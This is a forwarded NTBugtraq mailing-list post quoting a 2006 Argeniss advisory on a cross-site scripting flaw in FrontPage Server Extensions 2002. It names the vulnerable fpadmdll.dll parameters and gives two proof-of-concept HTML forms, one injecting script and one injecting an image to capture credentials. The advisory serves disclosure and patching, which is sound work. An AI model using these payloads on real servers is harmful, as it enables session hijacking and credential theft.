Thread-topic: Vulnerability in Microsoft FrontPage Server Extensions Could Allow Cross-Site Scripting
Технические детали уязвимости
> -----Original Message-----
> From: Windows NTBugtraq Mailing List
> [mailto:NTBUGTRAQ@xxxxxxxxxxxxxxxxxxxxxx] On Behalf Of
> Esteban Martinez Fayo
> Sent: Thursday, April 13, 2006 1:30 AM
> To: NTBUGTRAQ@xxxxxxxxxxxxxxxxxxxxxx
> Subject: Vulnerability in Microsoft FrontPage Server
> Extensions Could Allow Cross-Site Scripting
>
> Argeniss Security Advisory
>
>
> Name: Vulnerability in Microsoft FrontPage Server Extensions
> Could Allow
> Cross-Site Scripting (MS06-17)
> Affected Software: Microsoft FrontPage Server Extensions
> 2002 and Microsoft
> SharePoint Team Services
> Severity: Medium
> Remote exploitable: Yes (User intervention required)
> Credits: Esteban Mart?nez Fay?
> Date: 4/11/2006
> Advisory Number: ARG040602
>
>
> Details:
> The FrontPage Server Extensions 2002 (included in Windows
> Sever 2003 IIS 6.0
> and available as a separate download for Windows 2000 and XP)
> has a web page
> /_vti_bin/_vti_adm/fpadmdll.dll that is used for
> administrative purposes.
> This web page is vulnerable to cross site scripting attacks
> allowing an
> attacker to run client-side script on behalf of an FPSE user.
> If the victim
> is an administrator, the attacker could take complete control
> of a Front
> Page Server Extensions 2002 server.
>
> To exploit the vulnerability an attacker can send a specially
> crafted e-mail
> message to a FPSE user and then persuade the user to click a
> link in the
> e-mail message.
> In addition, this vulnerability can be exploited if an
> attacker hosts a
> malicious website and persuade the user to visit it.
>
> The vulnerable parameters of fpadmdll.dll are "operation",
> "command", and
> "name". These parameters appears in the output without
> properly sanitization
> in an HTML comment but it can be escaped with a '-->'.
>
> Exploit Examples:
>
> An attacker could create a FORM that POST to the FPSE server
> and executes a
> script on the client system.
> <form action=
> method="POST">
> <input type="hidden" name="operation"
> value="--><script>alert()</script>">
> <input type="hidden" name="action" value="none">
> <input type="hidden" name="port" value="/LM/W3SVC/1:">
> <input type="submit" name="page" value="healthrp.htm">
> </form>
>
> Also, an attacker could inject an image from another web site
> that he has
> control over and if it has HTTP authentication could convince
> the user to
> enter its credentials and capture it.
> <form action=
> method="POST">
> <input type="hidden" name="operation" value="--><img
> src=>">
> <input type="hidden" name="action" value="none">
> <input type="hidden" name="port" value="/LM/W3SVC/1:">
> <input type="submit" name="page" value="healthrp.htm">
> </form>
>
>
> Vendor Status:
> Vendor was contacted and a patch was released.
>
>
> Patch Available:
> Apply patch MS06-017.
>
>
> Links:
>
>
>
>
> Spam:
> Argeniss Ultimate 0day Exploits Pack
>
>
>
>
> Argeniss - Information Security
> *Application Security Experts*
>
>
> __________________________________________________
> Correo Yahoo!
> Espacio para todos tus mensajes, antivirus y antispam ?gratis!
> ?Abr? tu cuenta ya! -
>
> --
> NTBugtraq Editor's Note:
>
> Most viruses these days use spoofed email addresses. As such,
> using an Anti-Virus product which automatically notifies the
> perceived sender of a message it believes is infected may
> well cause more harm than good. Someone who did not actually
> send you a virus may receive the notification and scramble
> their support staff to find an infection which never existed
> in the first place. Suggest such notifications be disabled by
> whomever is responsible for your AV, or at least that the
> idea is considered.
> --
>
